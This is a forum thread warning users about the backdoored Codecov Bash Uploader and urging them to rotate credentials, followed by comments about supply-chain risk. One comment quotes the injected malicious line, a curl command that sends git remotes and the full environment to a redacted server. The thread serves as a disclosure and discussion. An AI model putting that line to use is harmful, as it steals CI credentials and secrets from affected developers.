Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


Important PSA - Codecov.IO Bash Uploader Security Update
New on LowEndTalk? Please Register and read our Community Rules.

Important PSA - Codecov.IO Bash Uploader Security Update

There has been a fairly serious backdoor implanted resulting in credential leakage.

If you use/have used their tool, please be sure to revoke/rotate your credentials immediately.

More information:

https://about.codecov.io/security-update/

Ars Technica has coverage here: https://arstechnica.com/gadgets/2021/04/backdoored-developer-tool-that-stole-credentials-escaped-notice-for-3-months/

Comments

  • WilliamWilliam Member, Provider

    So somebody updates a core component, they do not notice for 3 months and then the line added is this? THIS?

    The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script.
    
    curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http://<redacted>/upload/v2 || true
    

    Not some company or software i would ever use.

  • alexvolkalexvolk Member
    edited April 18

    I didn’t receive a communication from Codecov. Was I not affected? Collapse
    You may not have been affected. We have contacted users for whom we had email accounts and posted a notification in the app.

    Really? No email was received. Just logged in to my account and surprise:

    Action Required: You were Impacted by Codecov’s Bash Uploader Security Issue.
    Codecov recently disclosed a security issue. Based on our records, we believe you were impacted and should take immediate action.

    If you can't control the narrative, attack the person sharing useful information (c) @jar https://i.imgur.com/LMamJvS.png?

  • Daniel15Daniel15 Member
    edited April 18

    In news that should surprise nobody, downloading and executing an arbitrary shell script from a third party server as part of your build process may not be the most secure thing to do. You should really save a local copy to your repo so that changes can be properly audited.

  • @Daniel15 said: downloading and executing an arbitrary shell script from a third party server as part of your build process

    You'd be surprised at how many such issues go under reported and/or get masked under the veneer of automation.

    Sometime back, IIRC, there was a similar issue with some similar bad packages that were added into the Node package repository.

    This is definitely not going to be the end of such issues.

    An interesting read on a related issue is: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

Sign In or Register to comment.